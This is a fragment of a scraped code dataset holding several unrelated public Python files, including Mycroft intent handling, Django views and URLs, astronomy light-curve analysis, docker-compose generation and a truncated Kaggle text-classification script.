Perfection/Code/LEVEL3B (Trial).py","file_name":"LEVEL3B (Trial).py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"3655544740","text":"from functools import lru_cache\nfrom subprocess import call\nfrom threading import Event\nfrom time import time as get_time, sleep\n\nfrom os.path import expanduser, isfile\nfrom pkg_resources import get_distribution\n\nfrom mycroft.configuration import Configuration\nfrom mycroft.messagebus.message import Message\nfrom mycroft.skills.core import FallbackSkill\nfrom mycroft.util.log import LOG\n\n\nclass PadatiousService(FallbackSkill):\n instance = None\n\n fallback_tight_match = 5 # Fallback priority for the conf > 0.8 match\n fallback_loose_match = 89 # Fallback priority for the conf > 0.5 match\n\n def __init__(self, bus, service):\n FallbackSkill.__init__(self, use_settings=False)\n if not PadatiousService.instance:\n PadatiousService.instance = self\n\n self.padatious_config = Configuration.get()['padatious']\n self.service = service\n intent_cache = expanduser(self.padatious_config['intent_cache'])\n\n try:\n from padatious import IntentContainer\n except ImportError:\n LOG.error('Padatious not installed. Please re-run dev_setup.sh')\n try:\n call(['notify-send', 'Padatious not installed',\n 'Please run build_host_setup and dev_setup again'])\n except OSError:\n pass\n return\n\n self.container = IntentContainer(intent_cache)\n\n self._bus = bus\n self.bus.on('padatious:register_intent', self.register_intent)\n self.bus.on('padatious:register_entity', self.register_entity)\n self.bus.on('detach_intent', self.handle_detach_intent)\n self.bus.on('detach_skill', self.handle_detach_skill)\n self.bus.on('mycroft.skills.initialized', self.train)\n\n # Call Padatious an an early fallback, looking for a high match intent\n self.register_fallback(self.handle_fallback,\n PadatiousService.fallback_tight_match)\n\n # Try loose Padatious intent match before going to fallback-unknown\n self.register_fallback(self.handle_fallback_last_chance,\n PadatiousService.fallback_loose_match)\n\n self.finished_training_event = Event()\n self.finished_initial_train = False\n\n self.train_delay = self.padatious_config['train_delay']\n self.train_time = get_time() + self.train_delay\n\n self.registered_intents = []\n\n def train(self, message=None):\n if message is None:\n single_thread = False\n else:\n single_thread = message.data.get('single_thread', False)\n self.finished_training_event.clear()\n\n LOG.info('Training... (single_thread={})'.format(single_thread))\n self.container.train(single_thread=single_thread)\n LOG.info('Training complete.')\n\n self.finished_training_event.set()\n if not self.finished_initial_train:\n LOG.info(\"Mycroft is all loaded and ready to roll!\")\n self.bus.emit(Message('mycroft.ready'))\n self.finished_initial_train = True\n\n def wait_and_train(self):\n if not self.finished_initial_train:\n return\n sleep(self.train_delay)\n if self.train_time < 0.0:\n return\n\n if self.train_time <= get_time() + 0.01:\n self.train_time = -1.0\n self.train()\n\n def __detach_intent(self, intent_name):\n self.registered_intents.remove(intent_name)\n self.container.remove_intent(intent_name)\n\n def handle_detach_intent(self, message):\n self.__detach_intent(message.data.get('intent_name'))\n\n def handle_detach_skill(self, message):\n skill_id = message.data['skill_id']\n remove_list = [i for i in self.registered_intents if skill_id in i]\n for i in remove_list:\n self.__detach_intent(i)\n\n def _register_object(self, message, object_name, register_func):\n file_name = message.data['file_name']\n name = message.data['name']\n\n LOG.debug('Registering Padatious ' + object_name + ': ' + name)\n\n if not isfile(file_name):\n LOG.warning('Could not find file ' + file_name)\n return\n\n register_func(name, file_name)\n self.train_time = get_time() + self.train_delay\n self.wait_and_train()\n\n def register_intent(self, message):\n self.registered_intents.append(message.data['name'])\n self._register_object(message, 'intent', self.container.load_intent)\n\n def register_entity(self, message):\n self._register_object(message, 'entity', self.container.load_entity)\n\n def handle_fallback(self, message, threshold=0.8):\n if not self.finished_training_event.is_set():\n LOG.debug('Waiting for Padatious training to finish...')\n return False\n\n utt = message.data.get('utterance', '')\n LOG.debug(\"Padatious fallback attempt: \" + utt)\n intent = self.calc_intent(utt)\n\n if not intent or intent.conf < threshold:\n # Attempt to use normalized() version\n norm = message.data.get('norm_utt', '')\n if norm != utt:\n LOG.debug(\" alt attempt: \" + norm)\n intent = self.calc_intent(norm)\n utt = norm\n if not intent or intent.conf < threshold:\n return False\n\n intent.matches['utterance'] = utt\n self.service.add_active_skill(intent.name.split(':')[0])\n self.bus.emit(message.reply(intent.name, data=intent.matches))\n return True\n\n def handle_fallback_last_chance(self, message):\n return self.handle_fallback(message, 0.5)\n\n # NOTE: This cache will keep a reference to this calss (PadatiousService),\n # but we can live with that since it is used as a singleton.\n @lru_cache(maxsize=2) # 2 catches both raw and normalized utts in cache\n def calc_intent(self, utt):\n return self.container.calc_intent(utt)\n","repo_name":"injones/mycroft_ros","sub_path":"scripts/mycroft/skills/padatious_service.py","file_name":"padatious_service.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"34084093101","text":"from django.conf.urls.defaults import patterns, url\nfrom django.template.defaultfilters import slugify\n\nfrom rc.resources.views import ResourceItemListView\nfrom rc.resources.apps.education import models\n\ndef academic_centers_url_name(center_type_code):\n academic_center_types = dict(models.AcademicCenterType.CENTER_TYPES)\n return 'academic-centers-' + slugify(academic_center_types[center_type_code])\n\nurlpatterns = patterns(\n '',\n url(r'^alumni-sustainability-networks$',\n ResourceItemListView.as_view(\n model=models.SustainabilityNetwork,\n queryset=models.SustainabilityNetwork.objects.published()),\n kwargs={'member_only': True},\n name='sustainability-networks'),\n\n url(r'^study-abroad-programs-sustainability$',\n ResourceItemListView.as_view(\n model=models.StudyAbroadProgram,\n queryset=models.StudyAbroadProgram.objects.published()),\n name='study-abroad-programs',\n kwargs={'program_types': dict(models.StudyAbroadProgram.PROGRAM_TYPES),\n 'member_only': True}),\n\n url(r'^campus-and-campus-community-gardens$',\n ResourceItemListView.as_view(\n model=models.CommunityGarden,\n queryset=models.CommunityGarden.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='community-gardens',\n kwargs={'title': 'Campus and Campus-Community Gardens',\n 'member_only': True}),\n\n url(r'^campus-supported-agriculture-and-farms$',\n ResourceItemListView.as_view(\n model=models.CampusAgriculture,\n queryset=models.CampusAgriculture.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='campus-agricultures',\n kwargs={'title': 'Campus Supported Agriculture and Farms',\n 'member_only': True}),\n\n url(r'^campus-sustainable-living-guides$',\n ResourceItemListView.as_view(\n model=models.LivingGuide,\n queryset=models.LivingGuide.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='living-guides',\n kwargs={'member_only': True}),\n\n url(r'^campus-sustainability-mapstours$',\n ResourceItemListView.as_view(\n model=models.SustainabilityMap,\n queryset=models.SustainabilityMap.objects.published().order_by(\n 'organization__country', 'organization__name')),\n name='sustainability-maps',\n kwargs={'member_only': True, 'title': 'Campus Sustainability Maps and Tours'}),\n\n url(r'^surveys-sustainability-awareness-attitudes-and-values$',\n ResourceItemListView.as_view(\n model=models.SurveyOfAwareness,\n queryset=models.SurveyOfAwareness.objects.published().order_by(\n 'organization__name')),\n name='surveys-of-awareness',\n kwargs={'member_only': True}),\n\n url(r'^sustainability-course-inventories$',\n ResourceItemListView.as_view(\n model=models.SustainabilityCourseInventory,\n queryset=models.SustainabilityCourseInventory.objects.published().order_by(\n 'organization__name')),\n name='sustainability-course-inventories',\n kwargs={'member_only': True}),\n\n url(r'^sustainability-faculty-development-workshops$',\n ResourceItemListView.as_view(\n model=models.FacultyWorkshop,\n queryset=models.FacultyWorkshop.objects.published().order_by(\n 'organization__name')),\n name='faculty-workshops',\n kwargs={'member_only': True,\n 'title': 'Campus-led Faculty Development Workshops on Sustainability'}),\n\n url(r'^sustainability-research-inventories$',\n ResourceItemListView.as_view(\n model=models.ResearchInventory,\n queryset=models.ResearchInventory.objects.published().order_by(\n 'organization__name')),\n name='research-inventories',\n kwargs={'member_only': True}),\n\n url(r'^sustainability-related-syllabi-databases$',\n ResourceItemListView.as_view(\n model=models.SustainabilitySyllabus,\n queryset=models.SustainabilitySyllabus.objects.published().order_by(\n 'organization__name')),\n name='sustainability-syllabi',\n kwargs={'title':'Sustainability-Related Syllabi Databases',\n 'member_only': True}),\n\n url('^academic-centers-and-research-initiatives-sustainable-'\n 'agriculture$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='AG').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'agriculture_list.html'),\n name=academic_centers_url_name('AG'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Agriculture & Sustainability\",\n 'member_only': True,\n }),\n\n url('^sustainable-design-academic-centers$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='AR').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'architecture_list.html'),\n name=academic_centers_url_name('AR'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Architecture & Sustainability\",\n 'member_only': True,\n }),\n\n url('^business-school-academic-centers-and-'\n 'research-initiatives-sustainability$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='BS').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'business_list.html'),\n name=academic_centers_url_name('BS'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Business & Sustainability\",\n 'member_only': True,\n }),\n\n url('^research-centers-sustainable-development$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='DS').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'developmentstudies_list.html'),\n name=academic_centers_url_name('DS'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Development Studies & Sustainability\",\n 'member_only': True,\n }),\n\n url('^academic-centers-ecological-economics$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='EC').order_by('organization__country',\n 'organization__name'),\n template_name='education/academiccenters/'\n 'economics_list.html'),\n name=academic_centers_url_name('EC'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Economics & Sustainability\",\n 'member_only': True,\n }),\n\n url('^'\n 'academic-centers-sustainability-and-environmental-education$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='ED').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'education_list.html'),\n name=academic_centers_url_name('ED'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Education & Sustainability\",\n 'member_only': True,\n }),\n\n url('^sustainable-engineering-academic-centers$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='EN').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'engineering_list.html'),\n name=academic_centers_url_name('EN'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Engineering & Sustainability\",\n 'member_only': True,\n }),\n\n url('^academic-centers-focused-environmental-law$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='LW').order_by('organization__country',\n 'organization__name'),\n template_name='education/academiccenters/law_list.html'),\n name=academic_centers_url_name('LW'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Law & Sustainability\",\n 'member_only': True,\n }),\n\n url('^academic-centers-and-research-inititatives-urban-studies$',\n ResourceItemListView.as_view(\n model=models.AcademicCenter,\n queryset=models.AcademicCenter.objects.published().filter(\n type__type='US').order_by('organization__name'),\n template_name='education/academiccenters/'\n 'urbanstudies_list.html'),\n name=academic_centers_url_name('US'),\n kwargs={\n 'title': \"Campus Centers and Institutes on Urban Studies & Sustainability\",\n 'member_only': True,\n }),\n\n url('^courses-campus-sustainability$',\n ResourceItemListView.as_view(\n model=models.CampusSustainabilityCourse,\n queryset=models.CampusSustainabilityCourse.objects.published().order_by(\n 'organization__name', 'title'),\n template_name='education/academiccenters/'\n 'campussustainabilitycourse_list.html'),\n name='campus-sustainability-courses',\n kwargs={\n 'title': \"Courses Focusing on Campus Sustainability\",\n 'member_only': True,\n }),\n\n )\n","repo_name":"AASHE/django-irc","sub_path":"rc/resources/apps/education/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":10493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38585754300","text":"#!/usr/bin/env python3\n\n# SPDX-License-Identifier: CC0-1.0\n#\n# SPDX-FileContributor: Antonio Niño Díaz, 2023\n\nimport hashlib\nimport os\nimport random\nimport shutil\n\nNUM_FOLDERS = 20\nNUM_FILES = 100\n\ndef md5hash(_bytes):\n m = hashlib.md5()\n m.update(_bytes)\n return m.hexdigest()\n\ndef gen_file(directory_path, size):\n _bytes = bytearray(os.urandom(size))\n file_name = md5hash(_bytes)\n full_path = os.path.join(directory_path, file_name)\n\n with open(full_path, \"wb\") as f:\n f.write(_bytes)\n\ndef gen_tree(base_path):\n folder_paths = [base_path]\n\n # Generate all directories. They are created in any of the directories that\n # have already been generated.\n for num in range(NUM_FOLDERS):\n name = f\"dir{num}\"\n\n num_dirs = len(folder_paths)\n destination_dir = folder_paths[random.randint(0, num_dirs - 1)]\n\n new_folder_path = os.path.join(destination_dir, name)\n folder_paths.append(new_folder_path)\n os.mkdir(new_folder_path)\n\n for num in range(NUM_FILES):\n destination_dir = folder_paths[random.randint(0, NUM_FOLDERS - 1)]\n size = random.randint(1, 256) * 1024\n gen_file(destination_dir, size)\n\nif __name__ == \"__main__\":\n base = \"nitrofat\"\n\n if os.path.isdir(base):\n shutil.rmtree(base)\n os.mkdir(base)\n gen_tree(base)\n","repo_name":"blocksds/sdk","sub_path":"tests/filesystem/stress_test/gen_filesystem.py","file_name":"gen_filesystem.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"6"} +{"seq_id":"25322071730","text":"import csv\n\n# fuction to sort a scv file\ndef sort_csv(input_file, output_file, sort_column, delimiter=\",\"):\n with open(input_file, \"r\", newline='') as infile, open(output_file, 'w', newline='') as output_file:\n reader = csv.reader(infile, delimiter=delimiter)\n header = next(reader)\n sorted_data = sorted(reader, key=lambda row: row[sort_column])\n\n\n writer = csv.writer(output_file, delimiter=delimiter)\n writer.writerow(header)\n writer.writerow(sorted_data)\n\n\nif __name__==\"__main__\":\n input_file = 'input.csv'\n output_file = 'output.csv'\n sort_column = 0\n\n sort_csv(input_file, output_file, sort_column)\n print(f\"File '{input_file}' has been sorted by column {sort_column} and saved as '{output_file}'.\")\n","repo_name":"jitendrarmore/pythonscripts","sub_path":"CSVfileSort.py","file_name":"CSVfileSort.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8588270296","text":"import numpy as np\nimport lightkurve as lk\nfrom astropy.timeseries import LombScargle\n\ndef get_lc_data(id,instrument,cadence):\n \"\"\"Gets light curve data using Lightkurve.\n\n Returns:\n np.ndarray: Time data.\n np.ndarray: Flux data.\n np.ndarray: Number of light curve sectors.\n \"\"\"\n if type(id) != str:\n id = str(id)\n\n if instrument == 'tess':\n try:\n lc_files = lk.search_lightcurve('TIC'+id, cadence='short').download_all()\n print('cadence type: short')\n except:\n lc_files = lk.search_lightcurve('TIC'+id, cadence='long').download_all()\n print('cadence type: long')\n\n elif instrument == 'kepler':\n lc_files = lk.search_lightcurve('KIC'+id, cadence=cadence).download_all()\n print('cadence type: {}'.format(cadence))\n\n else:\n raise TypeError('Only Kepler and TESS are supported instruments')\n \n time, flux = np.array([]), np.array([])\n for q,lc in enumerate(lc_files):\n\n time_table = lc['time']\n this_time = []\n for val in range(0,len(time_table)):\n time_value = time_table[val].value\n this_time.append(time_value)\n\n this_flux = lc['pdcsap_flux']\n good = np.isfinite(this_time)\n \n median_flux = np.nanmedian(this_flux)\n this_flux = this_flux[good] / median_flux\n this_q = np.zeros_like(this_time) + q\n \n bad = np.logical_not(np.isfinite(this_flux))\n this_flux[bad] = 1.\n time = np.concatenate((time,this_time))\n flux = np.array(np.concatenate((flux,this_flux)))\n\n ###mask hack###\n t0 = 0\n per = 58\n for i in np.linspace(0,100):\n event_time = t0 + (i*per)\n mask = (time > (event_time - .5)) & (time < (event_time + .5))\n time = time[~mask]\n flux = flux[~mask]\n\n flux=flux-1.\n\n return time,flux\n\n\ndef freq_finder(time,flux,find_mode=False, qmin=0.,qmax=np.Inf):\n \"\"\"Finds frequency based off of LombScargle peaks. Fits parabola.\n\n Args:\n time (np.ndarray): Time data.\n flux (np.ndarray): Flux data.\n qmin (float): Minimum for frequency choice.\n qmax (float): Maximum for frequency choice.\n\n Returns:\n float: Frequency estimate that is improved upon in optimization step.\n np.ndarray: Frequency (x-) component of LombScargle.\n np.ndarray: Power (y-) component of LombScargle.\n \"\"\" \n q,y = LombScargle(time,flux).autopower()\n # f0_guess = q[np.argmax(y * (q > qmin) * (q < qmax))]\n #do per peak:\n modes = []\n #to get ys, get highest value and one after and one preceding?\n # ys = \n # x1 = \n # delta = \n f0_guess = refine_peak()\n print(\"Mode guess:\",f0_guess)\n\n return f0_guess\n\ndef refine_peak(y,x1,delta):\n \"\"\"\n Refines peak that corresponds to orbital period of companion.\n\n Args:\n y(np.ndarray): Array of three y-values corresponding to the y before, of, and after peak y.\n x1(float): X-value of y peak value (or y[1]).\n delta(flloat): X-axis difference between y[0] and y[1], and y[1] and y[2].\n\n Returns:\n float: Refined x-value of peak, ie refined orbital period.\n \"\"\"\n assert y.shape == (3,1)\n\n b = .5*(y[2]-y[0])/delta\n a = (-2*y[1]+y[0]+y[2])/(delta**2)\n\n assert a<0\n assert -delta<(-b/a) List[OriginVisitInfo]:\n \"\"\"Function that returns the list of visits for a swh origin.\n That list is put in cache in order to speedup the navigation\n in the swh web browse ui.\n\n The returned visits are sorted according to their date in\n ascending order.\n\n Args:\n origin_info: dict describing the origin to fetch visits from\n lookup_similar_urls: if :const:`True`, lookup origin with and\n without trailing slash in its URL\n\n Returns:\n A list of dict describing the origin visits\n\n Raises:\n swh.web.utils.exc.NotFoundExc: if the origin is not found\n \"\"\"\n\n from swh.web.utils import archive\n\n origin_url = archive.lookup_origin(\n origin_info, lookup_similar_urls=lookup_similar_urls\n )[\"url\"]\n\n cache_entry_id = \"origin_visits_%s\" % origin_url\n cache_entry = cache.get(cache_entry_id)\n\n last_visit = 0\n origin_visits = []\n new_visits = []\n per_page = archive.MAX_LIMIT\n if cache_entry:\n origin_visits = cache_entry\n last_visit = cache_entry[-1][\"visit\"]\n new_visits = list(\n archive.lookup_origin_visits(\n origin_url, last_visit=last_visit, per_page=per_page\n )\n )\n last_visit += len(new_visits)\n if not new_visits:\n last_snp = archive.lookup_latest_origin_snapshot(origin_url)\n if not last_snp or last_snp[\"id\"] == cache_entry[-1][\"snapshot\"]:\n return cache_entry\n\n # get new visits that we did not retrieve yet\n while 1:\n visits = list(\n archive.lookup_origin_visits(\n origin_url, last_visit=last_visit, per_page=per_page\n )\n )\n new_visits += visits\n if len(visits) < per_page:\n break\n last_visit += per_page\n\n def _visit_sort_key(visit):\n ts = parse_iso8601_date_to_utc(visit[\"date\"]).timestamp()\n return ts + (float(visit[\"visit\"]) / 10e3)\n\n # cache entry is already sorted with oldest visits\n origin_visits += sorted(new_visits, key=lambda v: _visit_sort_key(v))\n\n cache.set(cache_entry_id, origin_visits)\n\n return origin_visits\n\n\ndef get_origin_visit(\n origin_info: OriginInfo,\n visit_ts: Optional[str] = None,\n visit_id: Optional[int] = None,\n snapshot_id: Optional[str] = None,\n) -> OriginVisitInfo:\n \"\"\"Function that returns information about a visit for a given origin.\n\n If a timestamp is provided, the closest visit from that\n timestamp is returned.\n\n If a snapshot identifier is provided, the first visit with that snapshot\n is returned.\n\n If no search hints are provided, return the most recent full visit with\n a valid snapshot or the most recent partial visit with a valid snapshot\n otherwise.\n\n Args:\n origin_info: a dict filled with origin information\n visit_ts: an ISO 8601 datetime string to parse\n snapshot_id: a snapshot identifier\n\n Returns:\n A dict containing the visit info.\n\n Raises:\n swh.web.utils.exc.NotFoundExc: if no visit can be found\n \"\"\"\n # returns the latest full visit with a valid snapshot\n visit = archive.lookup_origin_visit_latest(\n origin_info[\"url\"], allowed_statuses=[\"full\"], require_snapshot=True\n )\n if not visit:\n # or the latest partial visit with a valid snapshot otherwise\n visit = archive.lookup_origin_visit_latest(\n origin_info[\"url\"], allowed_statuses=[\"partial\"], require_snapshot=True\n )\n\n if not visit_ts and not visit_id and not snapshot_id:\n if visit:\n return visit\n else:\n raise NotFoundExc(\n f\"No valid visit for origin with url {origin_info['url']} found!\"\n )\n\n # no need to fetch all visits list and search in it if the latest\n # visit matches some criteria\n if visit and (visit[\"snapshot\"] == snapshot_id or visit[\"visit\"] == visit_id):\n return visit\n\n if visit_id:\n return archive.lookup_origin_visit(origin_info[\"url\"], visit_id)\n\n if visit_ts:\n visit = archive.origin_visit_find_by_date(\n origin_info[\"url\"],\n parse_iso8601_date_to_utc(visit_ts),\n greater_or_equal=False,\n )\n if visit is not None:\n return visit\n else:\n raise NotFoundExc(\n (\n \"Visit with timestamp %s for origin with \"\n \"url %s not found!\" % (visit_ts, origin_info[\"url\"])\n )\n )\n\n visits = get_origin_visits(origin_info)\n\n if not visits:\n raise NotFoundExc(\n f\"No visits associated to origin with url {origin_info['url']}!\"\n )\n\n if snapshot_id:\n visits = [v for v in visits if v[\"snapshot\"] == snapshot_id]\n if len(visits) == 0:\n raise NotFoundExc(\n (\n \"Visit for snapshot with id %s for origin with\"\n \" url %s not found!\" % (snapshot_id, origin_info[\"url\"])\n )\n )\n return visits[0]\n\n return visits[-1]\n","repo_name":"SoftwareHeritage/swh-web","sub_path":"swh/web/utils/origin_visits.py","file_name":"origin_visits.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"41765912537","text":"from django.shortcuts import render, get_object_or_404, reverse\nfrom django.views import generic, View\nfrom django.http import HttpResponseRedirect\nfrom .models import Post\nfrom .forms import CommmentForm\n\n\n# create view code\nclass PostList(generic.ListView):\n # setting model to post\n model = Post\n # set this to 1 for posted comments and order in descending by created on\n queryset = Post.objects.filter(status=1).order_by('-created_on')\n template_name = 'index.html'\n paginate_by = 6\n\nclass PostDetail(View):\n\n def get(self, request, slug, *args, **kwargs):\n queryset = Post.objects.filter(status=1)\n post = get_object_or_404(queryset, slug=slug)\n comments = post.comments.filter(approved=True).order_by('created_on')\n liked = False\n if post.likes.filter(id=self.request.user.id).exists():\n liked=True\n\n\n return render(\n request,\n \"post_detail.html\",\n {\n \"post\" : post,\n 'comments': comments,\n 'commented': False,\n 'liked': liked,\n 'comment_form': CommmentForm(),\n },\n )\n\n def post(self, request, slug, *args, **kwargs):\n queryset = Post.objects.filter(status=1)\n post = get_object_or_404(queryset, slug=slug)\n comments = post.comments.filter(approved=True).order_by('created_on')\n liked = False\n if post.likes.filter(id=self.request.user.id).exists():\n liked=True\n\n\n comment_form = CommmentForm(data=request.POST)\n\n if comment_form.is_valid():\n comment_form.instance.email = request.user.email\n comment_form.instance.name = request.user.username\n commment = comment_form.save(commit=False)\n commment.post = post\n commment.save()\n\n return render(\n request,\n \"post_detail.html\",\n {\n \"post\" : post,\n 'comments': comments,\n 'commented': True,\n 'liked': liked,\n 'comment_form': CommmentForm(),\n },\n )\n\n\nclass PostLike(View):\n\n def post(self, request, slug, *args, **kwargs):\n post = get_object_or_404(Post, slug=slug)\n\n if post.likes.filter(id=request.user.id).exists():\n post.likes.remove(request.user)\n else:\n post.likes.add(request.user)\n\n return HttpResponseRedirect(reverse('post_detail', args=[slug]))","repo_name":"Colm1711/DjangoBlog","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24475378088","text":"from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove\n\n# KeyboardButton - непосредственно сама кнопка и она же отпровляет команду\n\nb1 = KeyboardButton('/Режим_работы')\nb2 = KeyboardButton('/Расположение')\nb3 = KeyboardButton('/Меню')\n# b4 = KeyboardButton('/Поделиться номером', request_contact=True)\n# b5 = KeyboardButton('/Отправить где я', request_location=True)\n\n#ReplyKeyboardMarkup - заменяет обычную клаву на ту, которую я создам\nkb_client = ReplyKeyboardMarkup(resize_keyboard=True) # resize_keyboard=True делает размер кнопки под то, что там написано\n# one_time_keyboard=True отвечает за то, чтобы после нажатия кнопки клавиатура скрывалась\nkb_client.add(b1).add(b2).add(b3) #.row(b4, b5)\n\n# метод add() - добовляет кнопку с новой строки\n# метод insert() - добовляет кнопку в ряд, если есть место\n# метод row() - добовляет все кнопки в одну строку\n# все эти методы можно компоновать как удобно","repo_name":"RinatStar420/telegramm_pizza_bot","sub_path":"keyboards/client_kb.py","file_name":"client_kb.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36828638233","text":"import yaml\n\nfrom docker_compose_utils import *\n\n\nclass GenerationConfig(object):\n def __init__(self, docker_repository, tags, api_version, subnet):\n self.docker_repository = docker_repository\n self.tags = tags\n self.api_version = api_version\n self.subnet = Subnet(subnet)\n self.gateway = self.subnet.default_gateway()\n\n def tag(self, repository):\n return self.tags[repository]\n\n\nclass VolumesGeneration(object):\n @staticmethod\n def generate(volumes):\n return dict((v, {}) for v in volumes)\n\n\nclass NetworksGeneration(object):\n @staticmethod\n def generate(generation_config):\n return {\n 'default': {\n 'ipam': {\n 'driver': 'default',\n 'config': [\n {\n 'subnet': generation_config.subnet.as_string(),\n 'gateway': generation_config.gateway\n }\n ]\n }\n }\n }\n\n\nclass ServiceGeneration(object):\n\n def __init__(self, service):\n self.service = service\n\n def generate(self, generation_config):\n if generation_config.docker_repository != '':\n repository_prefix = \"{}/\".format(generation_config.docker_repository)\n else:\n repository_prefix = ''\n properties = {\n 'image': '{}seahorse-{}:{}'.format(\n repository_prefix,\n self.service.image_name(),\n generation_config.tag(self.service.repository())),\n 'network_mode': self.service.network_mode or None,\n 'environment': self.service.environment().to_dict() or None,\n 'depends_on': [c.name() for c in self.service.depends_on()] or None,\n 'links': [c.name() for c in self.service.links()] or None,\n 'volumes': self.service.volumes() or None,\n 'ports': [Ports.exposed_on_localhost(pm.exposed, pm.internal)\n for pm in self.service.port_mapping()\n if self.service.port_mapping().generate],\n 'restart': self.service.restart\n }\n\n if self.service.network_mode != 'host':\n properties['networks'] = {\n 'default': {\n 'ipv4_address': self.service.internal_ip().host\n }\n }\n\n return self.service.name(), {k: v for (k, v) in properties.iteritems() if v is not None}\n\n\nclass ConfigurationGeneration(object):\n\n def __init__(self, configuration):\n self.configuration = configuration\n self.services = Services()\n\n\n def generate(self, generation_config):\n # Each service receives a full list of service instances so that it may use\n # their properties (like addresses, port numbers, etc)\n self.service_instances = [s(self.services, generation_config) for s in self.configuration.services]\n for si in self.service_instances:\n self.services.add_service(si)\n\n self.services.Frontend.API_VERSION = generation_config.api_version\n\n return {\n 'version': '2',\n 'services': dict(ServiceGeneration(s).generate(generation_config) for s in self.service_instances),\n 'volumes': VolumesGeneration.generate(self.configuration.volumes),\n 'networks': NetworksGeneration.generate(generation_config)\n }\n\n\ndef dump_yaml_to_string(json_obj):\n class MyDumper(yaml.Dumper):\n def increase_indent(self, flow=False, indentless=False):\n return super(MyDumper, self).increase_indent(flow, False)\n\n return yaml.dump(json_obj, Dumper=MyDumper, default_flow_style=False)\n","repo_name":"deepsense-ai/seahorse","sub_path":"deployment/docker-compose/docker_compose_generation/generation.py","file_name":"generation.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"6"} +{"seq_id":"11104625486","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 30 16:27:25 2019\n\n@author: WJH\n\"\"\"\n#%%\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport time\nimport numpy as np\nimport pandas as pd\nfrom utils import read_data_from_disk\nfrom models import model_fasttext, model_cnn\nfrom models import model_rnn_gru1_pool, model_rnn_gru3_atten, model_rnn_pool_atten\nfrom sklearn.model_selection import train_test_split\nfrom models import train_pred, find_best_thresh\n\n#%% Read data\nstart_time = time.time()\ntrain_X,test_X,train_y,features,test_features,embedding_matrix_mean = read_data_from_disk()\ntrain_X, val_X, train_y, val_y = train_test_split(train_X, train_y, \n test_size=0.1, random_state = SEED, \n stratify= train_y)\n\n#%% Train and Predict\nmodel = []\noutputs = []\nmodel_name = [\"model_cnn\",\"model_fasttext\",\"model_rnn_gru1_pool\",\"model_rnn_gru3_atten\",\"model_rnn_pool_atten\"]\n\n\nmodel.append(model_cnn(embedding_matrix_mean)) #epoch=1, 5min\nmodel.append(model_fasttext(embedding_matrix_mean)) #epoch=1,3min\nmodel.append(model_rnn_gru1_pool(embedding_matrix_mean)) #epoch=1,4min\nmodel.append(model_rnn_gru3_atten(embedding_matrix_mean)) #epoch=1,8.5min\nmodel.append(model_rnn_pool_atten(embedding_matrix_mean)) #epoch=1,5.5min\n\n\nfor i in range(len(model)):\n pred_val_y, pred_test_y = train_pred(model[i],train_X, train_y,val_X,val_y,test_X, epochs=2)\n best_thresh,best_score = find_best_thresh(val_y, pred_val_y,verbose=0)\n outputs.append([pred_val_y,pred_test_y,best_score,best_thresh,model_name[i]])\n print(f\"{model_name[i]} finished\")\n print(\"\")\n \n#%%\noutputs.sort(key = lambda x : x[2])\nfor output in outputs:\n print(output[2],output[3],output[4])\n \nfrom sklearn.linear_model import LinearRegression\nX = 